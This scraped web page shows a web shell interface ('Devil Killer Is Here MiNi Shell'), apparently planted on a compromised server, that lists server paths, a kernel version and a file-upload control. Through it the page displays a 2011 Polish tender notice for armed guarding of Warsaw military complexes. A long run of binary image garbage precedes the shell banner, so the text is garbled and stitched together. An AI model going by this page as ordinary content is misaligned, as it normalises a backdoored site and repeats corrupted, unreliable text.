JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111207/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111207/414828-N-2011.html

<p class="kh_header"><b>Warszawa: Wykonanie usługi ochrony na rzecz Jednostki Wojskowej Nr 1560</b><br>
<b>Numer ogłoszenia: 414828 - 2011; data zamieszczenia: 07.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 4198 , ul. Żwirki i Wigury 1C, 00-909 Warszawa, woj. mazowieckie, tel. 022 6821316, faks 022 6821316.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1blot.sp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa 4198.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi ochrony na rzecz Jednostki Wojskowej Nr 1560.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług na rzecz Jednostki Wojskowej 1560 przez Specjalistyczne Uzbrojone Formacje Ochronne (SUFO) w zakresie ochrony fizycznej osób i mienia,  realizowanych zgodnie z przepisami ustawy ochronie osób i mienia (Tekst jednolity: Dz. U. z 2005 r. Nr 145, poz. 1221 
z późn. zm.), ustawą o ochronie informacji niejawnych (Dz. U. 2010 r. Nr 182, poz.1228.), ustawą o broni i amunicji (Tekst jednolity: Dz. U. z 2004 r. Nr 52, poz. 525 z późn. zm.), Rozporządzeniem Ministra Obrony Narodowej z dnia 19 czerwca 1999 r. w sprawie ochrony przez Specjalistyczne Uzbrojone Formacje Ochronne terenów komórek i jednostek organizacyjnych resortu obrony narodowej (Dz. U. 
z 1999 r. Nr 60, poz. 647 z późn. zm.) i zasadniczym dokumentem normatywnym 
w zakresie ochrony obiektów wojskowych w Siłach Zbrojnych - Instrukcją 
o ochronie obiektów wojskowych Sygn. OIN 3-2008 wraz z innymi aktami wykonawczymi do ww. ustaw i dokumentów normatywnych dotyczących powyższego przedmiotu zamówienia;
2.Świadczenie usług polegać będzie na wykonywaniu zadań i czynności portierskich (bez broni i środków przymusu bezpośredniego) oraz bezpośredniej, stałej ochrony fizycznej z bronią palną krótką, karabinkiem lub pistoletem maszynowym kompleksów wojskowych nadzorowanych w zakresie ochrony fizycznej przez Jednostkę Wojskową 1560;
Wykonawca może ubiegać się o udzielenie zamówienia publicznego w niżej wymienionych obiektach wojskowych: 
.Bezpośrednia ochrona fizyczna kompleksu K - 6045 Warszawa; 
.Bezpośrednia ochrona fizyczna kompleksu K - 7046 położonego 
w odległości około 2 km od kompleksu głównego (K - 6045);
Bezpośrednia ochrona fizyczna wyżej wyszczególnionych kompleksów wojskowych będąca przedmiotem zamówienia, polegać będzie na:
W zakresie wykonywania czynności związanych z ochroną stref, obiektów, pomieszczeń i urządzeń:
.Stałej, bezpośredniej, całodobowej ochronie fizycznej stref, obiektów, pomieszczeń i urządzeń jednostek wojskowych rozlokowanych w kompleksie wojskowym  przed dewastacją, zniszczeniem, kradzieżą, penetracją oraz dostępem osób trzecich;
.Obsłudze biura przepustek poprzez kontrolowanie oraz wydawanie jednorazowych dokumentów uprawniających do wejścia (wjazdu) na (z) teren ochranianego kompleksu wojskowego;
.Zapewnieniu pełnej, całodobowej obsady kadrowej posterunków ochronnych, zewnętrznych, ruchomych (stałych), doraźnych, jak również patroli,  rozmieszczonych na terenie obiektów wojskowych;
.Utrzymywanie w stałej gotowości grupy interwencyjnej w składzie minimum 
2 pracowników ochrony, wyposażonych w broń palną wraz z amunicją, ustawowe środki przymusu bezpośredniego i własne środki łączności, wraz z własnym środkiem transportu, mogącej w czasie do 20 minut,  od momentu otrzymania sygnału, wesprzeć działania pracowników ochrony, pełniących służbę 
w kompleksach wojskowych nr 6045 i nr 7046, w przypadku wystąpienia sytuacji  szczególnych lub kryzysowych;
.Opracowaniu - przy współudziale i uzgodnieniu z Dowódcą Jednostki Wojskowej 1560  (lub wskazanej przez niego osoby) -Instrukcji ochrony-;
.Wykonywaniu z najwyższą starannością, czynności związanych ze świadczeniem usług ochronnych na rzecz Jednostki Wojskowej 1560 oraz wykonywaniu czynności kontrolnych, w zakresie i na zasadach wynikających z dokumentów normatywnych 
i instrukcyjnych;
.Kontroli uprawnień osób (pojazdów) do przebywania na terenie chronionych stref administracyjnych i stref bezpieczeństwa, obiektów lub pomieszczeń;
.Niedopuszczeniu do przebywania lub przedostania się na teren chronionych kompleksów, osób nieuprawnionych lub w sposób widoczny mogących stanowić zagrożenie dla osób lub ochranianego mienia;
.Ścisłym przestrzeganiu aktualnie obowiązujących decyzji i poleceń Dowódcy 
Jednostki Wojskowej 1560, wynikających z dokumentów regulujących zasady 
i zakres ochrony  kompleksów, dotyczących zezwoleń na wjazd i postój pojazdów na terenie  chronionych obiektów;
.Przyjmowaniu i wydawaniu kluczy oraz ich ewidencjonowaniu, zgodnie 
z -Wykazem osób upoważnionych do otwierania pomieszczeń podlegających ochronie-
.Otwieraniu bram i furtek na teren chronionych stref, obiektów lub pomieszczeń;
.Sprawdzaniu zgodności i aktualności dokumentów (przepustek, identyfikatorów itp. uprawniających do wejścia (wyjścia), wjazdu (wyjazdu) osób i pojazdów 
na (z) terenu ochranianego obiektu;
.Kontrolowaniu dokumentów uprawniających do wnoszenia (wynoszenia) wwożenia (wywożenia) na (z) terenu ochranianych obiektów mienia wojskowego;
.Wpuszczaniu na teren obiektu chronionego firm świadczących usługi na rzecz jednostek wojskowych (organizacyjnych) rozlokowanych w kompleksie wojskowym, zgodnie z -Wykazem pojazdów i kierowców firm obsługujących jednostkę wojskową.
-W szczególnie uzasadnionych przypadkach, co do zawartości bagażu osoby wchodzącej (wychodzącej), wjeżdżającej (wyjeżdżającej) na (z) terenu kompleksu, pracownicy ochrony wzywają oficera dyżurnego kompleksu lub jego pomocnika, jako wojskowy organ porządkowy, uprawniony do przeprowadzenia kontroli osobistej;
.W ramach sprawowania ochrony fizycznej pracownicy Wykonawcy muszą 
w sposób ciągły i nieprzerwany kontrolować obszar chroniony pod kątem ujawniania i zapobiegania zagrożeniom pożarowym;
.Udziale pracowników ochrony (pełniących służbę na posterunku) 
w przekazywaniu obiektów, pomieszczeń i urządzeń użytkownikom, a także przyjęcie ich pod ochronę po zakończeniu przez nich pracy, sprawdzeniu prawidłowości zamknięcia, zabezpieczenia i oplombowania, zgodnego ze wzorami plomb 
i odcisków pieczęci;
.Sprawdzaniu po godzinach pracy, stanu zabezpieczenia technicznego ochranianych  obiektów, pomieszczeń i urządzeń;
.Reagowaniu na sygnały emitowane przez systemy alarmowe zabezpieczające obiekty, pomieszczenia lub urządzenia jednostki, zgodnie z procedurami zawartymi w -Instrukcji ochrony-;
.Niedopuszczeniu do bezprawnego filmowania, fotografowania, szkicowania 
lub obserwacji stref, obiektów, pomieszczeń lub urządzeń sytuowanych w rejonie kompleksu oraz przeciwdziałaniu ewentualnym aktom sabotażu lub terroru;
.Zabezpieczeniu i ochronie stref, obiektów, pomieszczeń i urządzeń, położonych 
w rejonie chronionego kompleksu, przed wtargnięciem osób zakłócających ład 
lub porządek publiczny;
.Zabezpieczeniu i ochronie składników majątkowych, znajdujących się na terenie chronionych obiektów, przed kradzieżą, rabunkiem oraz ujawnianiu faktów dewastacji lub marnotrawstwa;
.Reagowaniu i natychmiastowym zgłaszaniu dowódcy ochrony wszelkich zauważonych zagrożeń dla mienia wojskowego, albo zdrowia lub życia osób, przebywających  na chronionych obiektach;
.W sytuacjach nagłych przyjmowaniu pod ochronę i zabezpieczaniu innego mienia wojskowego;
.W razie zaistnienia sytuacji  nadzwyczajnych, współdziałaniu w ewakuowaniu i zabezpieczeniu mienia wojskowego - zgodnie z decyzją oficera dyżurnego kompleksu;
.Niezwłocznym powiadamianiu Oficera Dyżurnego Jednostki Wojskowej 1560 oraz bezpośrednich przełożonych o stwierdzonych przestępstwach, nadzwyczajnych wydarzeniach oraz podejmowaniu niezbędnych czynności, w celu zabezpieczenia śladów i dowodów przestępstwa, ścisłym współdziałaniu w zakresie zapewnienia bezpieczeństwa i ochrony z Żandarmerią Wojskową, Policją oraz z Państwową Strażą Pożarną;
.Przekazywaniu Policji, Żandarmerii Wojskowej lub wojskowym organom porządkowym (wyłącznie na polecenie oficera dyżurnego kompleksu) osób ujętych podczas wykonywania zadań ochronnych oraz sporządzaniu notatek służbowych 
z zaistniałego zdarzenia;
.Informowaniu Oficera Dyżurnego Jednostki Wojskowej 1560 o nieprzestrzeganiu przez pracowników jednostki wojskowej (organizacyjnej), współpracowników lub inne osoby przebywające na terenie chronionego obiektu, obowiązujących przepisów porządkowych, ochronnych i przeciwpożarowych;
.Wykonywaniu innych zadań związanych z zapewnieniem na terenach chronionych obiektów bezpieczeństwa, porządku i ochrony mienia, zleconych przez uprawnione osoby;
.Wykonywaniu doraźnych poleceń koordynacyjnych, wydanych przez Oficera Dyżurnego Pełnomocnika ochrony lub Komendanta ochrony Jednostki Wojskowej 1560, związanych z ochroną obiektów;
.Utrzymaniu porządku i właściwego stanu sanitarno - higienicznego 
w pomieszczeniach socjalno - bytowych oddanych w użytkowanie Wykonawcy oraz w rejonach posterunków;
.Niezwłocznym zgłaszaniu oficerowi dyżurnemu kompleksu, wszelkich zaistniałych awarii w pomieszczeniach wartowni lub w rejonach ochranianych obiektów (w tym również uszkodzeń ogrodzenia zewnętrznego, bram, furtek oraz szlabanów);

W zakresie podległości służbowej i sprawowania nadzoru (kontroli):
.Dowódca ochrony podlega: pod względem służbowym - oficerowi dyżurnemu kompleksu, na terenie którego wykonuje zadania ochronne, a pod względem fachowym - osobie upoważnionej przez Wykonawcę;
.Pracownicy ochrony fizycznej (wartownicy i portierzy) pod względem pełnienia służby podlegają  dowódcy ochrony kompleksu;
.Merytoryczny oraz dyscyplinarny nadzór i kierownictwo nad pracownikami zatrudnionymi do realizacji zadań ochronnych w poszczególnych kompleksach sprawuje Wykonawca lub osoba przez niego upoważniona;
.Wykonawca zobowiązuje się do prowadzenia wyrywkowych kontroli, w zakresie właściwej organizacji oraz toku pełnienia służby przez siły ochrony, wykonujące zadania na poszczególnych kompleksach, jednak nie mniej niż 3 razy w tygodniu, 
w tym: jeden raz w tygodniu w godzinach 22.00 - 06.00 oraz jeden raz w dzień dodatkowo lub ustawowo wolny od pracy;
.Wykonawca jest zobowiązany poddać się nadzorowi nad działalnością, na zasadach i w zakresie określonym w art. 43 oraz 44 ust 1 i 1a Ustawy z dnia 22 sierpnia 1997 o ochronie osób i mienia (Dz. U. z 2005 r. nr 145 poz. 1221 z późn. zm.), o wynikach której ma obowiązek powiadomić - w formie pisemnej - Dowódcę Jednostki Wojskowej 1560 i Dowódcę Jednostki Wojskowej 4198; 
.Ponadto, Wykonawca jest zobowiązany poddać się kontroli ochrony obiektów, dotyczącej zgodności realizacji czynności ochronnych z zakresem powierzonych zadań, na zasadach i w zakresie określonym w aktualnie obowiązujących przepisach wskazanych w § 236 i § 240 -Instrukcji o ochronie obiektów wojskowych-, sygn.: OIN 3-2008, o wynikach której, w części dotyczącej Wykonawcy, Dowódca jednostki, na terenie której wykonuje zadania ochronne - w formie pisemnej - powiadomi Wykonawcę;
.Dowódca jednostki wojskowej, na rzecz którego świadczona będzie usługa zastrzega sobie prawo do prowadzenia kontroli w zakresie jakości i zgodności realizacji czynności ochronnych z zakresem zadań zleconych do realizacji, na zasadach określonych w § 237 ust.2 Instrukcji o ochronie obiektów wojskowych, oraz zgodnie z decyzją Zamawiającego:
a)Szef sztabu (Szef sztabu - Zastępca Dowódcy) jednostki wojskowej jako organ odpowiedzialny za organizację i funkcjonowanie służb wewnętrznych,
b)Oficer dyżurny kompleksu - jako organ odpowiedzialny za właściwą realizację czynności ochronnych oraz współdziałanie poszczególnych służb wewnętrznych (w tym SUFO);
c)inne osoby na podstawie pisemnego upoważnienia Dowódcy jednostki wojskowej, na rzecz którego świadczona będzie usługa;
.Dowódca jednostki, na rzecz którego świadczona będzie usługa,  zastrzega sobie - w ramach świadczonej usługi - prawo do kontroli  (nie mniej niż raz w miesiącu) stawienia się, w określonym reżimie czasu (do 20 minut) grupy interwencyjnej Wykonawcy, na terenie chronionego kompleksu, celem potwierdzenia jej zdolności do natychmiastowych działań, wspierających pracowników ochrony 
w sytuacjach szczególnych lub kryzysowych;
.Zamawiający, jako organ odpowiedzialny za wydatkowanie środków budżetowych zastrzega sobie prawo do sprawowania nadzoru nad zgodnością wydatkowania środków finansowych na przedmiot zamówienia, to jest za terminowe i należyte wykonywanie zadań ochronnych na rzecz jednostki, w której świadczona będzie usługa, za które Zamawiający - jako dysponent III stopnia - ponosi odpowiedzialność prawną, w osobie:
a)Pełnomocnika ds. ochrony informacji niejawnych Jednostki Wojskowej 4198;
b)Komendanta ochrony Jednostki Wojskowej 4198.
c)Inne osoby na podstawie pisemnego upoważnienia wydanego przez Zamawiającego.
W zakresie spełniania wymogów przez Wykonawcę,  pracowników i osoby upoważnione przez Wykonawcę:
.Wykonawca musi posiadać ważne Świadectwo Bezpieczeństwa Przemysłowego - pierwszego stopnia, zgodnie z art. 54 ust. 2 ustawy o ochronie informacji niejawnych (Dz. U. 2010 r. Nr 182, poz.1228.)
.Osoba odpowiedzialna za merytoryczny oraz dyscyplinarny nadzór i kierownictwo nad pracownikami zatrudnionymi do realizacji zadań ochronnych 
w poszczególnych kompleksach musi posiadać:
-poświadczenie bezpieczeństwa osobowego upoważniające do dostępu 
do informacji niejawnych, oznaczonych klauzulą, co najmniej -POUFNE-;
-zaświadczenie o odbyciu przeszkolenia w zakresie ochrony informacji niejawnych, zgodnie z art. 21 ustawy o ochronie informacji niejawnych (Dz. U. 2010 r. Nr 182 poz.1228);
-licencję ochrony osób i mienia II stopnia;
zgodnie z art. 27 w nawiązaniu do art. 3 pkt. 1 Ustawa z dnia 22.08.1997 
o ochronie osób i mienia ( z późn. zm.);                                  
-pisemne upoważnienie Wykonawcy do kierowania oraz sprawowania nadzoru merytorycznego i dyscyplinarnego nad pracownikami ochrony;
.Dowódca ochrony ( pomocnik dowódcy ochrony ) musi posiadać:
-pisemne upoważnienie wystawione przez Wykonawcę lub ważne  poświadczenie bezpieczeństwa osobowego do dostępu do informacji niejawnych, oznaczonych klauzulą, co najmniej -ZASTRZEŻONE-;
zgodnie z ustawą o ochronie informacji niejawnych (Dz. U. 2010 r. Nr 182, poz.1228.)
-zaświadczenie o odbyciu przeszkolenia w zakresie ochrony informacji niejawnych,
-licencję ochrony osób i mienia II stopnia;
-pozwolenie na broń krótką (pistolet lub rewolwer);
zgodnie z art. 27 w nawiązaniu do art. 3 pkt. 1 Ustawa z dnia 22.08.1997 o ochronie osób i mienia  ( z późn. zm.);                                  
.Pracownicy ochrony, pełniący służbę na posterunkach, muszą posiadać:
-pisemne upoważnienie wystawione przez Wykonawcę lub ważne  poświadczenie bezpieczeństwa osobowego do dostępu do informacji niejawnych, oznaczonych klauzulą, co najmniej -ZASTRZEŻONE-;
-zaświadczenia o odbyciu przeszkoleniu w zakresie ochrony informacji niejawnych,
zgodnie z art. 27 Ustawy z dnia 22.01.1999 o ochronie informacji niejawnych; 
( z późn. zm.);
-licencję ochrony osób i mienia I stopnia;
-pozwolenie na broń długą, typu: karabinek lub pistolet maszynowy;
zgodnie z art. 26 w nawiązaniu do art. 3 pkt. 1 Ustawa z dnia 22.08.1997 o ochronie osób i mienia  ( z późn. zm.);   
.Pracownicy ochrony - portierzy, pełniący służbę w biurze przepustek, muszą posiadać:
-pisemne upoważnienie wystawione przez Wykonawcę lub ważne  poświadczenie bezpieczeństwa osobowego do dostępu do informacji niejawnych, oznaczonych klauzulą, co najmniej -ZASTRZEŻONE-;
-zaświadczenia o odbyciu przeszkolenia w zakresie ochrony informacji niejawnych,
zgodnie z art. 27 Ustawy z dnia 22.01.1999 o ochronie informacji niejawnych 
( z późn. zm.);
.Osoba dokonująca wizji lokalnej ze strony Wykonawcy, w wyszczególnionych kompleksach, musi posiadać oraz okazać - w dniu przeprowadzenia wizji - aktualne poświadczenie bezpieczeństwa osobowego, upoważniające do dostępu do informacji niejawnych oznaczonych klauzulą, co najmniej, -POUFNE-, zaświadczenie o odbyciu przeszkolenia w zakresie ochrony informacji niejawnych,  licencję ochrony osób i mienia II stopnia, a ponadto, w przypadku konieczności sporządzenia odpisów lub notatek z dokumentów udostępnionych przez Dowódcę Jednostki Wojskowej 1560, albo szkiców lub schematów, dotyczących systemu ochrony i danych, dotyczących poszczególnych obiektów i pomieszczeń, również zeszyt lub notatnik, zarejestrowany w kancelarii tajnej (jawnej) Wykonawcy o klauzuli co najmniej -ZASTRZEŻONE-;
W zakresie zobowiązań Wykonawcy:
Wykonawca oraz zatrudnieni przez niego pracownicy, realizujący zadania ochronne w poszczególnych kompleksach, są zobowiązani do przestrzegania przepisów wynikających z ustawy o ochronie informacji niejawnych (Dz. U. 2010 r. Nr 182, poz.1228.), w związku z możliwością dostępu do informacji niejawnych oznaczonych klauzulą -ZASTRZEŻONE- w zakresie niezbędnym do wykonywania zadań, związanych z realizacją czynności ochronnych w poszczególnych kompleksach - pod rygorem odpowiedzialności karnej i dyscyplinarnej, zgodnie z obowiązującymi przepisami prawa;
Ponadto, Wykonawca zobowiązany jest do:
.Oznaczenia pracowników ochrony w sposób jednolity, umożliwiający ich identyfikację (numer służbowy) oraz identyfikację podmiotu zatrudniającego (logo firmy);
.Zapewnienia noszenia jednolitego ubioru przez pracowników ochrony z logo Wykonawcy, umożliwiającego ich identyfikację oraz identyfikację podmiotu zatrudniającego w przypadkach, o których mowa w art. 20 ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia;
.Estetycznego i schludnego wyglądu pracowników Wykonawcy, realizujących zadania ochronne na poszczególnych kompleksach (nieeksponowanie biżuterii osobistej na szyi, oraz innych częściach ciała, w tym: w ustach, brwiach, powiekach, uszach, itp.). Zezwala się na noszenie biżuterii ozdobnej w postaci obrączki, sygnetu lub pierścienia na palcach dłoni;
.Posiadania własnych środków łączności satelitarnej, kablowej, radiowej (radiotelefonicznej), komórkowej lub innej, zapewniającej łączność pomiędzy dowódcą ochrony na danym kompleksie, a Wykonawcą, celem zaalarmowania grupy interwencyjnej;
.Posiadania własnych środków łączności radiowej (radiotelefonicznej) dla każdego pracownika pełniącego służbę ochronną na posterunku, w ramach danego kompleksu,  pozwalających na utrzymanie stałej łączności z dowódcą ochrony, 
z każdego punktu obiektu;
.Zainstalowania urządzeń automatycznie powiadamiających lub sygnalizujących dowódcę ochrony o napadzie na pracownika ochrony w miejscu wykonywania przedmiotu zamówienia (pilot napadowy);
.Wyposażenia każdego pracownika ochrony, pełniącego służbę na poszczególnych kompleksach, w broń palną (krótką - dowódca ochrony, karabinek lub pistolet maszynowy - pomocnik dowódcy ochrony, pracownik ochrony pełniący służbę na posterunku), amunicję do danego typu broni oraz środki przymusu bezpośredniego (w tym obowiązkowo: ręczne miotacze gazu i kajdanki), zgodnie 
z wyszczególnionym zestawieniem sił ochronnych;
.Prowadzenia stałego szkolenia pracowników ochrony oraz organizowania ćwiczeń 
w strzelaniu z broni będącej na ich wyposażeniu z udziałem przedstawiciela Zamawiającego - co najmniej raz na dwa miesiące - jak również przedłożenia Zamawiającemu oraz Dowódcy JW 1560 dokumentacji potwierdzającej ich odbycie (w postaci list wyników strzelania, informacji pisemnej lub innego dokumentu);
.Zaangażowania sił ochronnych (dowódców ochrony, pracowników ochrony oraz grupy interwencyjnej) do udziału w szkoleniach kwartalnych organizowanych przez Dowódcę jednostki wojskowej, na rzecz których realizują one zadania ochronne, 
w zakresie pozorowanego naruszenia systemu ochrony obiektów wojskowych 
z udziałem przedstawicieli Żandarmerii Wojskowej, SKW, Policji i Państwowej Straży Pożarnej.
.Pisemnego przedstawiania, Dowódcy Jednostki Wojskowej 1560, imiennych harmonogramów czasu pracy pracowników ochrony, jednak nie później niż 5 dni przed ostatnim dniem roboczym danego miesiąca, poprzedzającego miesiąc objęty przedmiotem umowy.
.Pisemnego powiadamiania Dowódcy Jednostki Wojskowej 1560 ( oficera dyżurnego kompleksu), na rzecz którego świadczy usługę, o zamiarze wprowadzenia na obiekt nowych pracowników ochrony, nie ujętych w harmonogramie, z co najmniej dwudniowym wyprzedzeniem, lub niezwłocznie (przed jego wejściem na ochraniany obiekt), w przypadku nagłego zachorowania lub innej, uzasadnionej nieobecności pracownika, wraz z załączonymi, potwierdzonymi - za zgodność - dokumentami: upoważnienie do dostępu do informacji niejawnych lub poświadczenie bezpieczeństwa osobowego o właściwej klauzuli, zaświadczenie o odbyciu przeszkolenia w zakresie ochrony informacji niejawnych, licencja ochrony osób 
i mienia I stopnia, pozwolenie na rodzaj broni wykorzystywanej w ochronie danego obiektu;
.Przestrzegania postanowień zawartych w Instrukcji Bezpieczeństwa Przemysłowego;
.Wyznaczenia osoby odpowiedzialnej za sprawowanie nadzoru merytorycznego, dyscyplinarnego i kierowanie zatrudnionymi, do realizacji przedmiotu zamówienia, pracowników ochrony, oraz koordynacji współdziałania pomiędzy Dowódcą jednostki wojskowej, na rzecz której świadczona będzie usługa, Zamawiającym i Wykonawcą;
.Niezwłocznej wymiany pracownika, który dopuścił się uchybień w czasie wykonywania zadań ochronnych oraz pisemnego uzasadnienia konieczności zmiany pracownika ochrony,  skierowanego do Dowódcy jednostki wojskowej, na rzecz którego wykonuje zadania ochronne. Nowo wyznaczony pracownik powinien posiadać, co najmniej takie same kwalifikacje i uprawnienia, jak pracownik, którego zwolniono z wykonywania czynności ochronnych;
.Utrzymania, przez cały okres obowiązywania umowy, najwyższej staranności 
w realizacji przedmiotu zamówienia;
W zakresie dodatkowych wymagań związanych z realizacją przedmiotu zamówienia:
.Szczegółowy zakres i kompetencje osób prowadzących kontrole zawarte będą 
w -Umowie - oraz -Instrukcji ochrony-, opracowanej zgodnie z wymogami zawartymi w -Rozporządzeniu Ministra Obrony Narodowej z dnia 19.06.1999r. 
w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów jednostek organizacyjnych resortu obrony narodowej (Dz. U. z 1999r. nr 60 poz. 647 z późn. zm.);
.Wykonawca ponosi odpowiedzialność za wszelkie zniszczenia wynikłe z jego winy 
i osób trzecich w trakcie wykonywania usługi i jest zobowiązany do ich usunięcia 
na własny koszt.
.Wykonawca musi uwzględnić, że zamówienie będzie wykonywane w systemie zmian dowódcy zmiany i wartowników, co 24 godziny:
.Wykonawca musi posiadać własną grupę interwencyjną z pojazdem i minimum 
2 pracowników ochrony wyposażonych w broń palną z amunicją, ustawowe środki przymusu bezpośredniego oraz własne środki  łączności, mogącej w czasie do 20 minut  od momentu otrzymania sygnału wesprzeć działania pracowników ochrony 
w obiektach zamawiającego, w przypadku wystąpienia sytuacji  szczególnych 
lub kryzysowych;
.Zamawiający nie przewiduje ponoszenia dodatkowych kosztów, związanych 
z działaniem grupy interwencyjnej, zapewniającej pomoc (wsparcie) pracownikom ochrony;
.Zamawiający wymaga, aby Wykonawca gwarantował stabilność składu osobowego zespołu pracowników, realizujących w imieniu Wykonawcy przedmiot zamówienia;
.Zamawiający wymaga, aby Wykonawca na etapie złożenia oferty przedstawił wykaz pracowników przewidzianych do realizacji przedmiotu zamówienia wraz 
z oświadczeniem, że wskazanych pracowników będzie zatrudniał na podstawie umowy o pracę;
.Zamawiający zastrzega sobie prawo zgłaszania wniosków oraz opiniowania zasadności dokonywania zmian w składzie zespołu realizującego przedmiot zamówienia; 
